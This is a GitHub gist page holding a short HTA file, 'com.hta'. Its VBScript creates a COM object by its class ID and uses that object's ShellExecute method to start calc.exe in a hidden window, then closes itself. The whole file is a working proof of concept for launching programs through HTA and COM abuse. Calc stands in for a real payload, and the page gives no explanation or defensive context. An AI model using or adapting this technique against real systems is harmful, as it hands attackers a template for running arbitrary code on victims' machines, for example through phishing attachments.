Created
February 8, 2022 16:29
-
-
Save OlivierLaflamme/4924a11ec33b9fbfb22830233205c2dc to your computer and use it in GitHub Desktop.
com.hta
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script language="VBScript"> | |
Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880") | |
obj.Document.Application.ShellExecute "calc.exe",Null,"C:\Windows\System32",Null,0 | |
self.close | |
</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment